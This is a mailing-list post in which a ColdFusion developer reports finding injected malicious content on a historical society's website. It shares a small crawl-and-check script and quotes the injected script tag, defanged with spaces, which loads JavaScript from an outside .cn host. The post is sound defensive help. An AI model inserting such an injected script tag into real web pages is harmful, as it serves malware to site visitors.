Tim, I have confirmed you do in fact still have at least one page on your site with malicious content. I just created a simple script which hit every page Google has for your site and breifly analyzed the source.
I googled for "site:connhisto.org" I then copied and pasted the 24 links into a list and ran this code: <cfoutput> <cfset sites = "http://www.connhisto.org/~http://www.connhisto.org/index.cfm?p=10~http://www.connhisto.org/index.cfm?p=3&pid=4231~http://www.connhisto.org/index.cfm?p=3&pid=4233~http://www.connhisto.org/index.cfm?p=3&pid=4221~http://www.connhisto.org/index.cfm?p=3&pid=4234~http://www.connhisto.org/index.cfm?p=3&pid=4224~http://www.connhisto.org/index.cfm?p=10&documentid=6309&q=1~http://www.connhisto.org/index.cfm?p=10&documentid=6321&q=1~http://www.connhisto.org/index.cfm?p=4&pid=4221&spid=4222~http://www.connhisto.org/index.cfm?p=4&pid=4220&spid=4259~http://www.connhisto.org/index.cfm?p=11~http://www.connhisto.org/index.cfm?p=7~http://www.connhisto.org/index.cfm?p=4&pid=4224&spid=4228~http://www.connhisto.org/index.cfm?p=3&pid=4220~http://www.connhisto.org/index.cfm?p=4&pid=4224&spid=4226~http://www.connhisto.org/index.cfm?p=10&documentid=6291&q=1~http://www.connhisto.org/index.cfm?p=4&pid=4224&spid=4229~http://www.connhisto.org/index.cfm?p=4&pid=4221&spid=4223~http://www.connhisto.org/index.cfm?p=4&pid=4224&spid=4230~http://www.connhisto.org/index.cfm?p=10&documentid=6318&q=1~http://www.connhisto.org/index.cfm?p=4&pid=4224&spid=4225~http://www.connhisto.org/index.cfm?p=10&documentid=6316&q=1~http://www.connhisto.org/index.cfm?p=4&pid=4220&spid=4261";> <cfloop list="#sites#" index="site" delimiters="~"> <cfhttp url="#site#"></cfhttp> #site# (#cfhttp.statuscode#)<br> <cfif cfhttp.filecontent contains ".js" or cfhttp.filecontent contains ".htm"> <span style="color:red">Bad!</span><br> <cfelse> <span style="color:green">Good!</span><br> </cfif><br> </cfloop> </cfoutput> This code is way too generic and wouldn't work on most sites, but since you don't seem to have ANY .js files or .htm links, it was relativley easy to find your bad apple. THIS PAGE (don't click! Spaces added to prevent auto-linking): http:// www. connhisto. org/ index.cfm? p=3& pid=4220 has this script (don't click! Spaces added to prevent auto-linking): : <script src="http:/ /sdo. 1000mg. cn/ csrss/ w.js"></script><!-- Immediatley following this text: If you have a job opening you would like to list on our site, please e-mail Amos You should clean that page or the database table that populates it. ~Brad ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:313701 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
